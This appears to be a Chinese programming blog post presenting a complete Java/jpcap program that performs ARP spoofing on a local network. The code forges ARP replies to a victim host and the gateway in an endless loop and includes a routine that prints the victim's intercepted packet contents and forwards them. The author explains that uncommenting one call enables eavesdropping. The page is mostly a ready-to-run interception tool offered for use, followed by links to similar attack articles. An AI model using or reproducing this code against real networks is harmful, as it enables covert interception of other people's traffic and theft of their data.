ARP欺骗在局域网内拦截和窃听他人通讯

最新推荐文章于 2024-06-04 16:30:58 发布
最新推荐文章于 2024-06-04 16:30:58 发布
阅读量1.7k 收藏 3
点赞数
分类专栏: 网络安全

使用jpcap。下载链接为http://pan.baidu.com/s/1jG5wLHs。内含对应的jar和dll。

配置方法:

在windows 64位中(amd 和英特尔均可),下载jpcap安装包。需要提前安装winpcap。

配置Jpcap路径:这一步也是最重要的一步。具体路径为,把Jpcap文件夹下lib文件夹里的Jpcap.dll复制到"C:\Program Files\Java\jre1.6.0_07\bin"文件夹里面(复制到你机器JRE文件夹放到bin文件夹里面就可以了,其中JRE的版本一定要与Eclipse配置的版本一致),再把Jpcap文件夹下lib文件夹里的Jpcap.jar复制到"C:\Program Files\Java\jre1.6.0_07\lib\ext"文件夹里面(复制到你机器JRE文件夹->lib->ext放到ext文件夹里面就可以了)。
      

然后配置EclipseJRE环境,(一定需要),选择Window->preferences->Java->Installed JREs,Installed JREs选择框中选择相应的JRE版本,点Edit,选择Add External JARs…,选择你的Jpcap.jar包("C:\Program Files\Java\jre1.6.0_07\lib\ext"文件夹里),在Finish就配置全部完成了;

在eclipse中代码如下

import java.io.IOException;
import java.net.InetAddress;
import java.net.UnknownHostException;

import jpcap.JpcapCaptor;
import jpcap.JpcapSender;
import jpcap.NetworkInterface;
import jpcap.packet.ARPPacket;
import jpcap.packet.EthernetPacket;
import jpcap.packet.IPPacket;
import jpcap.packet.Packet;
import jpcap.packet.TCPPacket;






public class ChangeARP {
	private NetworkInterface[] devices;
	private NetworkInterface device;
	private JpcapCaptor jpcap;
	private JpcapSender sender;
	private ARPPacket arpTarget,arpGate;
	private byte[] targetMAC,gateMAC;
	private String targetIP,gateIP;
	
	private void getDevice() throws IOException{
		devices = JpcapCaptor.getDeviceList();
		//may not have only one devices
		device = devices[0];
		jpcap = JpcapCaptor.openDevice(device, 2000, false, 10000);
		jpcap.setFilter("ip", true);
		sender = jpcap.getJpcapSenderInstance();		
	}
	
	public ChangeARP(byte[] targetMAC,String targetIP,byte[] gateMAC,String gateIP)
			throws UnknownHostException,InterruptedException{
		//may be buggy
		this.targetMAC = targetMAC;
		this.targetIP = targetIP;
		this.gateMAC = gateMAC;
		this.gateIP = gateIP;
		try{
			getDevice();
		}catch(IOException e){
			
		}
		
		///
		//以下程序用于构建欺骗目标的arp包,使用自己的mac地址,冒充他人ip
		//
		//
		//
		建立ARP包///
		arpTarget = new ARPPacket();
		//以太网类型
		arpTarget.hardtype = ARPPacket.HARDTYPE_ETHER;
		//ip类型
		arpTarget.prototype = ARPPacket.PROTOTYPE_IP;		
		//relay类型
		arpTarget.operation = ARPPacket.ARP_REPLY;
		//mac地址为6个字节
		arpTarget.hlen = 6;
		//ip地址为4个字节
		arpTarget.plen = 4;		
		arpTarget.sender_hardaddr = device.mac_address;
		arpTarget.sender_protoaddr = InetAddress.getByName(gateIP).getAddress();
		arpTarget.target_hardaddr = targetMAC;
		arpTarget.target_protoaddr = InetAddress.getByName(targetIP).getAddress();
		
		//建立以太网包
		EthernetPacket ethToTarget = new EthernetPacket();
		ethToTarget.frametype = EthernetPacket.ETHERTYPE_ARP;
		ethToTarget.src_mac = device.mac_address;
		ethToTarget.dst_mac = targetMAC;
		
		arpTarget.datalink = ethToTarget;
		///
		//以下程序用于构建欺骗网关的arp包
		//
		//
		//
		arpGate = new ARPPacket();
		arpGate.hardtype = ARPPacket.HARDTYPE_ETHER;
		arpGate.prototype = ARPPacket.PROTOTYPE_IP;
		arpGate.operation = ARPPacket.ARP_REPLY;		
		arpGate.hlen = 6;
		arpGate.plen = 4;
		arpGate.sender_hardaddr = device.mac_address;
		arpGate.sender_protoaddr = InetAddress.getByName(targetIP).getAddress();
		arpGate.target_hardaddr = gateMAC;
		arpGate.target_protoaddr = InetAddress.getByName(gateIP).getAddress();
		
		EthernetPacket ethToGate = new EthernetPacket();
		ethToGate.frametype = EthernetPacket.ETHERTYPE_ARP; 
		ethToGate.src_mac = device.mac_address; // A的MAC地址 
		ethToGate.dst_mac = gateMAC; // 网关的MAC地址  
		arpGate.datalink = ethToGate; 

        System.out.println(arpTarget);  
        System.out.println(arpGate);  
        
		///
		//发射线程
		//
		//
		//
        new Thread(new Runnable() {  
        	public void run() {  
        		while (true) {  
        			sender.sendPacket(arpTarget);  
        			sender.sendPacket(arpGate);  
        			System.out.println("hahahahaahah");
                    try {  
                    	Thread.sleep(500);  
                    } catch (InterruptedException e) {  
                    	e.printStackTrace();  
                    }  
        		}  
        	}  
        }).start();  
        //recP();//接收数据并转发
	}
	
	///
	//用于转发数据
	//
	//
	//
	public void recP(){
		IPPacket ipPacket = null;
		while(true){
			ipPacket = (IPPacket)jpcap.getPacket();
			if(ipPacket == null)
				continue;
			
			if(ipPacket.src_ip.getHostAddress().equals(targetIP)){
				System.out.println(ipPacket);
				System.out.println(new String(ipPacket.data));				
			}
			
			if(ipPacket.src_ip.getHostAddress().equals(targetIP)){
				send(ipPacket,gateMAC);
			}else{
				send(ipPacket,targetMAC);
			}						
		}		
	}
	///
	//用于发射
	//
	//
	//
	private void send(Packet packet,byte[] changeMac){
		EthernetPacket eth;
		if(packet.datalink instanceof EthernetPacket){
			eth = (EthernetPacket)packet.datalink;
			for(int i=0;i<6;i++){
				eth.dst_mac[i]=changeMac[i];
				eth.src_mac[i]=device.mac_address[i];
			}
			sender.sendPacket(packet);
		}
		
	}
			
	
	public static void main(String[] args)throws Exception{
		byte[] targetMAC = new byte[6];
        targetMAC[0] = (byte) 0x6c;  
        targetMAC[1] = (byte) 0x62;  
        targetMAC[2] = (byte) 0x6d;  
        targetMAC[3] = (byte) 0x3c;  
        targetMAC[4] = (byte) 0xab;  
        targetMAC[5] = (byte) 0x77; 

		byte[] gateMAC = new byte[6];
        gateMAC[0] = (byte) 0x68;  
        gateMAC[1] = (byte) 0xbd;  
        gateMAC[2] = (byte) 0xab;  
        gateMAC[3] = (byte) 0x33;  
        gateMAC[4] = (byte) 0xff;  
        gateMAC[5] = (byte) 0x80;

		
		
		
		String targetIP = "192.168.48.14";
		String gateIP = "192.168.48.1";
		System.out.println(System.getProperty("java.library.path"));
		ChangeARP temp = new ChangeARP(targetMAC,targetIP,gateMAC,gateIP);		
	}

}
如果要监听对方通信,请将recp前的注释取消掉。



define_us
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络安全实战(一)ARP欺骗
weixin_42474227的博客
12-30 4210
网络安全实战(一)ARP欺骗
计算机通信过程详解 与 arp欺骗
weixin_42109053的博客
07-19 688
一、计算机通信过程 1.1 如下图,是数据的封装层次结构。 在网络层,数据的首部会添加IP地址,组合后的数据格式称为数据报。 在链路层,数据报的首部会添加 mac地址,组合后的数据格式称为数据帧。 1.2 如下图,是两台计算机通信的过程。 数据段、源IP和目标IP确定之后,接下来是确定源和目标MAC地址。 过程1:在该网段内,目标IP与源IP不是同一网段,所以该数据帧会发送给路由器,由路由器负责转发。 此时目标MAC地址应该指明交换机将数据帧发送给路由器,所以目标MAC 地址是M2地址。 过程2:在该网段
ARP欺骗的原理与详细步骤
最新发布
CCSco4355
06-04 390
我还记得在计算机网络课程当中,学过ARP协议,ARP是地址转换协议,是链路层的协议,是硬件与上层之间的接口,同时对上层提供服务。在局域网中主机与主机之间不能直接通过IP地址进行通信,而是使用硬件自带的MAC地址进行通信,如果使用IP地址通信就需要IP地址与MAC地址之间有对应关系,ARP协议解释对应转换地址的协议。主机都有一个ARP表,这个表存储能够与该主机进行通信的主机的IP与MAC地址之间的对应关系,ARP缓存表有老化机制,时间长了会被清除,再次建立连接需要通过广播进行建立。
使用ARP对局域网进行欺骗攻击
运维密码
10-12 1651
ARP是什么? ARP是地址转换协议(Address Resolution Protocol)的英文缩写。是链路层协议,工作在OSI 模型的第二层,在本层和硬件接口间进行联系,同时对上层(网络层)提供服务。在局域网中我们的主机网卡通信并不能直接使用IP通信,而是使用硬件自带的MAC地址进行通信,想要用IP通信。IP地址与MAC地址之间就必须存在一种对应关系,而ARP协议就是用来确定这种对应关系的...
局域网内的主机实施ARP欺骗并监听数据
qq_39072699的博客
09-27 5483
局域网内的主机实施ARP欺骗并监听数据 本文主要介绍如何在Windows 10上的Ubuntu虚拟机上完成ARP欺骗,攻击同一局域网下的受害主机。   攻击者环境: Ubuntu 14.04.5虚拟机环境 Arpspoof:用于实施ARP欺骗 Wireshark:用于实施监听活动 nmap:用于扫描探测局域网的攻击对象   局域网环境: 在搭建的局域网内,包含一台手机和两台笔...
黑客实现ARP欺骗
jklbnm12的博客
01-19 1535
一、内容 1.网络嗅探:Wireshark 监听网络流量,抓包。 2.ARP欺骗:科来数据包发生器,构造欺骗报文。 3.防范: 防范arp欺骗、非法DHCP防范。 二、使用的工具和平台 Wireshark:用来抓包, 科来数据包生成器、科来数据包播放器:构造欺骗的ARP欺骗报文 平台:使用Win10作为攻击机,靶机时虚拟机中的Win7 三、ARP欺骗原理 同一局域网里面的两台主机之间相互通信是通过Mac地址寻址的,而如果两台主机若不是处于同一子网里面,则在通信的时候会相互将数据发送给各自的路由器网关,通过网
ARPCheat.rar_Arpcheat_arp_arp spoofing tool_arp欺骗_局域网ARP
07-14
ARP欺骗工具,用于局域网,希望大家只是作为参考不要用于局域网
基于 Java 使用 ARP 协议获取局域网内部活动主机的物理地址【100011074】
03-02
首先寻找并打开适合的网络适配器,然后根据输入的局域网 IP 地址构造 ARP 的数据包,然后通过 Java 对网卡数据捕获需要用到 jpcap,jpcap 调用 wincap 实现数据包的发送,并监听返回的数据包,分析局域网内返回的...
ARP 欺骗在局域网中的分析及全面防御
08-27
ARP 欺骗在局域网中的分析及全面防御~~~~~~~~~~~~`
使用ARP协议获取局域网内活动主机的物理地址
08-21
在计算机网络中,ARP(Address Resolution Protocol)协议是TCP/IP协议栈中的一个重要组成部分,它的主要功能是在局域网(LAN)环境中将IP地址解析为物理地址(MAC地址)。当发送数据时,源主机需要知道目标主机的...
ensp加kali实现arp欺骗攻击
04-21
在网络安全领域,ARP欺骗是一种常见的攻击手段,它利用了局域网中地址解析协议(ARP)的缺陷。本文将深入探讨如何使用Kali Linux这一专业安全操作系统,配合ENSPI(Ethernet Network Simulation Platform,以太网...
ARP实现窃听密码
o3Ev的博客
04-08 485
ARP实现窃听密码 先附上我之前的两篇关于ARP的文章,大家可以先去看看 ARP1 , ARP2 这里就直接准备实验环境了: 1台kali 1台win10主机 攻击流程: 首先在kali里输入ifconfig,得到kali的ip地址 然后继续输入:route -n,得到当前网关地址,我这里为192.168.0.1 然后在win10主机上输入ipconfig,得到win10的ip地址,我现在的是192.168.0.2 这时他们都处于同一局域网下,可以进行ARP攻击,我们在kali里输入: a
arp欺骗
jiangbianxiumu的专栏
08-01 464
arp是什么?中文名:地址解析协议。我们知道在局域网中网络数据包得发送不是根据ip进行传输,而是根据mac地址。当某一个主机A准备发送一个数据包时,首先他会发送一个广播,告诉周围的计算机我将要发送一个ip是**.**.**.**的数据包,如果哪一台主机的网卡是这个ip地址,请立即告诉我你的mac地址。这个询问的过程就是一个arp请求,而回答这个请求的主机发出去的数据包就是一个arp应答。  
过滤或者拦截ARP包的方法
philarlar的专栏
08-05 5233
没想到除了iptables还有个arptables,网上的资料
使用kali进行局域网ARP欺骗攻击与监听
qq_42039946的博客
01-21 5118
一、环境准备 物理机:win10电脑一台 VMware Workstation Pro虚拟化软件 Kali_linux虚拟机一台 kali虚拟机网卡配置为桥接模式并桥接到物理机网卡。 使用如下命令安装dsniff工具 apt-get install dsniff 二、ARP欺骗攻击 1.通过arp -a检查攻击前的主机arp表,网关mac地址为77-a6-29 2.在kali端使用arpspoof命令进行arp欺骗 sudo arpspoof -i eth0 -t 192.168.
基于JAVA的ARP欺骗的程序实现
SAVA_LOL的博客
11-04 4199
在实现ARP欺骗之前,我们必须知道什么是ARP。        在局域网当中,当主机或其它网络设备有数据要发送给另一个主机或设备时,它必须要知道对方的IP地址,但仅仅有IP地址是不够的,因为IP数据报文必须封装成帧才能通过物理网络发送,因此发送站还必须有接收站的物理地址,所以需要一个从IP地址到物理地址的映射。ARP就是实现这个功能的协议。 我们通过一个简单的例子来解释一下ARP在局域网中的运
ARP断网攻击与监听
weixin_56956399的博客
04-12 4449
ARP断网攻击与监听 ARP欺骗获取图片

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值